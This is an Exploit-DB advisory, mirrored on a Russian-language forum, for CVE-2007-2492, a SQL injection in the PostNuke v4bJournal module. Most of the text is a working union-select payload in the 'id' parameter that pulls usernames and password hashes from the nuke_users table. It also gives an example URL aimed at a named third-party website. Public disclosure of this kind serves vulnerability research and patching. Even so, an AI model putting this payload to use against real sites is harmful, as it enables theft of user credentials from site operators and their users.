- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 3835
- Проверка EDB
-
- Пройдено
- Автор
- ALI ABBASI
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2007-2492
- Дата публикации
- 2007-05-02
Код:
----------------------------------------
PostNuke Journal
----------------------------------------
DISCOVERED BY :Ali Abbasi
Olom Fonon Mazandaran University - Security Research Center, Babol, Iran
Greetz For All Y! UnderGround Group Members ( www.2600.ir )
Greetz For All Persian Bugtraq Members ( www.bugtraq.ir )
Contact: [email protected]
{SQL BUG}
in
index.php?module=v4bJournal&func=journal_comment&id=(SQL)
------------------------------------------
EXPLIOT BY :ABDUCTER
Greetz For ABDUCTER Real Friend Nanos (Nancy)
Contact: [email protected]
index.php?module=v4bJournal&func=journal_comment&id=-1/**/union/**/select/**/0,pn_uname,pn_pass,3,4,pn_uname,6,7,8,9,10,11,12,13,14/**/from/**/nuke_users/**/where/**/pn_uid=2/*
EX:-
http://www.arsfoodcourt.com/index.php?module=v4bJournal&func=journal_comment&id=-1/**/union/**/select/**/0,pn_uname,pn_pass,3,4,pn_uname,6,7,8,9,10,11,12,13,14/**/from/**/nuke_users/**/where/**/pn_uid=2/*
U must regrister first ( You Most Register First )
-------------------------------------------
# milw0rm.com [2007-05-02]- Источник
- www.exploit-db.com
